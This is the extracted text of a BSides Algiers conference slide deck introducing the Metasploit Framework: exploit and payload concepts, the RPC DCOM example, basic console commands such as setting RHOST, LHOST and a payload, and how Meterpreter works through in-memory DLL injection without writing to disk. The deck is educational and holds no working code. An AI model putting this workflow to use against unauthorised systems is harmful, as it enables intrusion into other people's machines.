BSides Algiers - Metasploit framework - Oussama Elhamer


Published on

Published in: Technology, Education
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

BSides Algiers - Metasploit framework - Oussama Elhamer

  1. 1. The Metasploit FrameworkBy Elhamer Oussama Abdelkhalek
  2. 2. Contents :• Introduction :I. Basics .II. Running an attack The old fashioned way .III. Overview of the metasploit project and frameworkIV. Run the same attack using metasploit .• Metasploit overview and Basic framework usage .I. Metasploit Architechture .II. Consols .• MeterPreter basics and overView
  3. 3. Exploitation !• Vulnerability : a weakness which allow an attacker to braek into a system security.• Exploit : code which allow attacker to take advantage of a vulnerable system• Payload : A code that Run On the System After Exploitation
  4. 4. -Vunerability-Exploit-Payload
  5. 5. 1. Exploit RunsFirst 2. PayLoad Runs NextIf Exploit Succeed Exploit + Payload Data DownLooadVulnerableSystem Attacker Uploading Malwares …
  6. 6. Run an Exploit The Old Fashion Way.The Vulnerability : RPCDCOM The Buffer Overflow In Rcp Interface ;.The Exploit And The PayLoad are Availble ;
  7. 7. The Problem !• A Lot Of Exploits !• Hard To Cutomize The Payload .• Testing exploit Research is Painfull !.• Metasploit is a Short Cut 
  8. 8. What Is Metasploit ?• Metasploit has come to be synonymous with the Metasploit Framework.• The Metasploit Project Whose goal is to provide information that will be useful inI. Pentration Testing.II. IDS Signature.I. exploit research.• Developped By H.D Moor 2003 then acquired by Rapid7• Primarily written in perl,• Then Rewritten in Ruby ‘Largest proGramme Even Wrotte In Ruby’ !!• The framework is an open-source platform for developing, testing and using exploit code.• The current “stable” version is version 4• Similar to the commercial projects Canvas (Immunity) and Impact (Core)
  9. 9. Benefits• Over 600 tested exploits and 200 payloads !• Plug and play of payloads with exploits -matching the Payload whith The Exloit -Try different Payload with The Same Exploit Code .• Lot Of Tools and Features For better And Faster pentests
  10. 10. Using Metasploit • Show – list modules available (exploits, payloads, etc) • Use – Use a specific exploit module • Set – set specific variables (Case sensitive) • RHOST – Remote Host (who we’re attacking) • PAYLOAD – The payload to carry • LHOST – Local Host (for the phone home attacks, reverse shell) • Exploit – run the exploit. • RpcDcom Using Metasploit.
  11. 11. Using Metasploit :
  12. 12. Metasploit Architecture:
  13. 13. MeterPreter• What We Are Looking For is a Payload which :• - Avoid Creation of a new Process .• - Should Run in The Exploited process’ Context.• - Should Not Created a new File On disk .• - Import More Functionality (extending ) and not Be Limited Whith The Created Remote Shell Commande .• - That Exactly What MeterPreter Do !
  14. 14. Meterpreter Basics• Post exploitation Tool• Woks by using in memory DLL injection• Does Not Create any files on disk• Uses encrypted communication between Client and Attacker• Stable ,Flexible and Extensible !• Can be extended at runtime by shipping dlls To the Victime
  15. 15. How It Works• When The Exploit Succeed• Exploit and Run The First PayLoad • PayLoad Connectes Back To Msf • 2nd Stage Dll Injection Payload Sent • Msf Sends Merterpreter Server Dll• Client And Server Communication 
  16. 16. Using Meterpreter• DEMO
  17. 17. Client Server CommunicationIn Meterpreter• The Communication Is Encrypted .• In The Form of TlVs (Type Length Value).• So Multiple Channels Of communication can use the same client –server connection .• Allow For multiple programs running on the victim to communicate at the same Time .• Demo.